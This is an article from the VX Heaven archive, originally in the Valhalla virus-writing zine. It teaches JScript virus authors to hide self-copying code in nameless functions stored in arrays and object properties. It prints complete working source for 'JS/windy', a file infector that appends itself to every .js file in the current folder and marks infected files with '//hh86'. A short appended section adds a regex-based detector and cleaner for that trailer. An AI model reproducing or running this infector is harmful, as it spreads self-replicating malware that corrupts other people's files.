
VX Heaven


Function Me

hh86
Valhalla #1
August 2011


What is it?

In JScript we have functions. They are declared like this: "function x(){}". The name seems to be important for identifying them; however, this is not true: they can be nameless.

Reflections

When we want to have a copy of our code in an infection routine, we commonly open the file we are running from and read it entirely. But we can also assign an entire function to a variable and call the variable instead, and we can also assign functions into arrays (so we can push and pop functions). This one is especially my favourite:

x = [function(){code}, function(){code2}, function(){code3}]
x[1]()
//or
r = "hh"+x[1]()+"86"

Awesome!

They have no name, so there is no very obvious reference to the function we want to execute, and besides, "x[1]()" is very nice, isn't it? :) An array seems to be an especially good place to permutate the code: move it around among lots of garbage and then execute it without eval. A nameless function can reference itself in the array by using the array name and its index.

There is also the Expando. We create an Object type variable:

var h = {}
h.hh86 = "I feel sleepy today"

But we can assign any name we want to the expando; for example, we could use POP, which is the Array method that pops the last item out:

var h = {}
h.pop = "Looks like POP"

But we know that POP is not complete there. For a true POP we need "()" for the method call. So, we can assign a function instead:

var h = {}
h.pop = function(){WScript.Echo("Hello from POP")}
h.pop()

This is like using Prototype, but smaller. ;)

h={};h.pop=function(){...};h.pop()

So that is pretty much everything for an explanation of the technique; now you have to try it yourself using your imagination. I have written a simple demo. It must have no comments and must be single-lined to run correctly in infected files:

u();
function u(){
/*JS/windy by hh86*/
f = new ActiveXObject("Scripting.FileSystemObject");
n = ";x" + f.GetTempName().substr(3, 4);
r = "[" + Math.floor(Math.random()*100) + "]";
v = n + "=[]" + n + r + "=" + u + n + r + "()";    //create array to hold virus code
for(y = new Enumerator(f.getfolder(".").files); !y.atEnd(); y.moveNext())
{
    x = y.item();
    if(f.GetExtensionName(x).toLowerCase()=="js")
    {
        try
        {
            b = f.OpenTextFile(x);
            h = b.ReadAll();
            b.Close();
            if(h.substr(h.length-4, 4) != "hh86")
            {
                 p = x.Attributes;
                 x.Attributes = 0;
                 l = f.CreateTextFile(x);    //append virus code
                                             //but it was a trick and the clock struck 12
                 l.Write(h + "\r\n" + v + "//hh86");
                 l.Close();
                 x.Attributes = p
            }
        }
        catch(e){}
    }
}
//at the end of the tail - just darkness
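As an added example (not part of the article or the demo), here is the detection side of the same trailer: the demo appends a one-line "name=[]name[k]=function ... name[k]()" construct and ends the file with "//hh86", which it also uses as its already-infected check. The regex, the benign script and the sample trailer below are constructed from that description; no files are touched.

```javascript
// Detector and cleaner for the appended trailer described above.
// Trailer shape (one line):  ;xNNNN=[];xNNNN[k]=function u(){...};xNNNN[k]()//hh86
// NNNN = 4 chars taken from GetTempName, k = random 0..99, "//hh86" = infection marker.
const MARKER = "//hh86";

// The array name must repeat (backreference \1) and be invoked on the same index (\2).
const TRAILER_RE =
  /\r?\n(;x\w{4})=\[\]\1\[(\d{1,2})\]=function\b[^\r\n]*\1\[\2\]\(\)\/\/hh86$/;

// Classify a file's text: a matching trailer, or only the marker (an inoculated file
// that the demo would skip), or neither.
function inspect(text) {
  const m = TRAILER_RE.exec(text);
  return {
    infected: Boolean(m),
    markerOnly: text.endsWith(MARKER) && !m,
    arrayName: m ? m[1] : null,
    slot: m ? Number(m[2]) : null,
  };
}

// Remove the trailer (and the CRLF the demo inserts before it); unchanged if absent.
function clean(text) {
  const m = TRAILER_RE.exec(text);
  return m ? text.slice(0, m.index) : text;
}

// Constructed sample: a harmless script with a trailer appended the way the demo does.
const ORIGINAL = 'WScript.Echo("hello");';
const BODY = 'function u(){f=new ActiveXObject("Scripting.FileSystemObject");}';
const SAMPLE = ORIGINAL + "\r\n" + ";xa1b2=[];xa1b2[17]=" + BODY + ";xa1b2[17]()" + MARKER;

console.log(inspect(SAMPLE));          // { infected: true, ..., arrayName: ';xa1b2', slot: 17 }
console.log(clean(SAMPLE) === ORIGINAL); // true
```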